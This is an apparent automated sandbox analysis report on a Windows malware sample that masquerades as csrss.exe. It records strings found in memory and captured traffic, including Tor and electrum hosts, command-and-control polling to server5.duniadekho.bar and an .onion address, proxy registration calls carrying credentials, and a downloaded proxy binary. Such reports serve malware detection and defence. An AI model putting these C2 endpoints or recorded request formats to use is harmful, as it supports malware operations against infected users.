Source: csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork 
is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: unknown DNS query: name: stun.stunprotocol.org
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server5.duniadekho.barUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15Content-Length: 752Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1Host: server5.duniadekho.barUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.102 Safari/537.36Content-Length: 752Version: 195Accept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /v4/register_subscriber HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 122Accept: application/jsonContent-Type: application/x-www-form-urlencodedSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /v4/register_subscriber HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 122Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/register_subscriber", response="c831806b14e2c3b7004579ec11587612cdb1b3917335891cf7235198c99dc729", algorithm=SHA-256, cnonce="000275160ea60cbdba91b4cc7df429a08789804f2c6a668bf7f545196daed8cb", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000002Content-Type: application/x-www-form-urlencodedSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /v4/register_device HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 104Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/register_device", response="e52728886ab90acd4e20176061d98c9597dfc0e29f7caa7fe9f79f26f8a6905e", algorithm=SHA-256, cnonce="096351fa04f952336d066a61ea276680eb33abaa2d9cd34e42ccb75380bbebe6", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000003Content-Type: application/x-www-form-urlencodedCookie: session=MTY4NTI2NjQ1OHxOd3dBTkVOWVZETk1WMUpQUjBkWFVsQTNRelkyVWtoWVRUTlJUMUJYTjBwT1JGUlNSMDgyV2pSU1JVZFlNMFZITWs1S1NEWkhWVkU9fO17cEDOazaCKbxTQueC_XgaY796TAY41P_GtC_vwNFlSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /v4/discover HTTP/1.1Host: api.sec-tunnel.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232Content-Length: 79Accept: application/jsonAuthorization: Digest username="se0316", realm="ApiDigest", nonce="/4Ky2S+EQNGLy90l", uri="/v4/discover", response="6646ff41f2e352bbf338a01d45b12aa3ad1ca7b27dd967c0cec8bb32f4d3882a", algorithm=SHA-256, cnonce="1aac6b7a1b1d1ba6d73b41ee4a40e57426e70bce1ac85d74449c90bceeb0c432", opaque="KPVLh09NoSzfihFl", qop=auth, nc=00000004Content-Type: application/x-www-form-urlencodedCookie: session=MTY4NTI2NjQ1OHxOd3dBTkVOWVZETk1WMUpQUjBkWFVsQTNRelkyVWtoWVRUTlJUMUJYTjBwT1JGUlNSMDgyV2pSU1JVZFlNMFZITWs1S1NEWkhWVkU9fO17cEDOazaCKbxTQueC_XgaY796TAY41P_GtC_vwNFlSE-Client-Version: Stable 74.0.3911.232SE-Operating-System: WindowsAccept-Encoding: gzip
Source: global traffic TCP traffic: 192.168.11.20:49996 -> 62.210.99.238:39819
Source: global traffic TCP traffic: 192.168.11.20:49999 -> 77.68.94.106:9001
Source: global traffic UDP traffic: 192.168.11.20:64952 -> 74.125.204.127:19302
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 28 May 2023 09:32:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.0.25Access-Control-Allow-Credentials: false
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 28 May 2023 09:33:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/8.0.25Set-Cookie: PHPSESSID=9afcop0lb77374j5hf7sfs0fck; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheAccess-Control-Allow-Credentials: false
Source: unknown TCP traffic detected without corresponding DNS query: 51.159.136.111
Source: unknown TCP traffic detected without corresponding DNS query: 77.68.94.106
Source: unknown TCP traffic detected without corresponding DNS query: 147.135.65.26
Source: unknown TCP traffic detected without corresponding DNS query: 158.69.205.247
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://invalidlog.txtlookup
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
Source: powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000035.00000002.209188988689.00000000709CD000.00000020.00000001.01000000.00000010.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d
Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll
Source: csrss.exe, 00000014.00000003.213018965141.000000000C49C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP
Source: csrss.exe, 00000014.00000003.211838432797.000000000C808000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionhttp://server5.vcr4vuv4
Source: csrss.exe, 00000014.00000003.213018868802.000000000C4AA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionserver5.vcr4vuv4sf5233b
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionC:
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp String found in binary or memory: http://www.xmlspy.com)
Source: csrss.exe String found in binary or memory: http://www.zlib.net/
Source: csrss.exe, 00000014.00000003.210662530760.000000000C6C6000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210662422652.000000000C6D6000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.zlib.net/D
Source: csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://1.1.1.1/dns-query
Source: csrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.sec-tunnel.com/v4/device_generate_passwordinternal
Source: csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.sec-tunnel.com/v4/discoverhttps://api.sec-tunnel.com/v4/geo_listindex
Source: csrss.exe, 00000014.00000003.210616758241.000000000D754000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211821043822.000000000CE0E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.sec-tunnel.com/v4/subscriber_logininconsistent
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://blockchain.infoindex
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.bar
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.213018965141.000000000C48C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barMicrosoft
Source: csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barSETCONF
Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barTransfer-Encodingtworkpoll
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4E4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duniadekho.barhttp://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onionCommonPro
Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: csrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210654541812.000000000C8A4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exe
Source: csrss.exe, 00000014.00000003.210641444415.000000000C9BC000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211820907766.000000000CE1E000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210640405754.000000000D234000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210616640622.000000000D764000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/ameshkov/dnslookup/
Source: csrss.exe, 00000014.00000003.213018965141.000000000C48A000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.211839807582.000000000C48A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.comW
Source: csrss.exe, 00000014.00000003.210653294128.000000000C950000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.210671924295.000000000C4BC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/350494541/0257ea00-a853
Source: csrss.exe, 00000014.00000003.210653914185.000000000C90E000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar
Source: csrss.exe, 00000014.00000003.211839807582.000000000C4A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581
Source: csrss.exe, 00000014.00000003.210667598347.000000000C5EA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/poll
Source: csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/restriction-us
Source: csrss.exe, 00000014.00000003.210659966591.000000000C7BE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/restriction-usH2
Source: csrss.exe, 00000014.00000003.209395939200.000000000C624000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/signature/
Source: csrss.exe, 00000014.00000003.210671361655.000000000C4DA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e
Source: csrss.exe, 00000014.00000003.210658786957.000000000C805000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.barH
Source: csrss.exe, 00000014.00000003.210659083983.000000000C7FC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://server5.duniadekho.bararch=64-bit&build_number=19042&Intel%28R%29
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
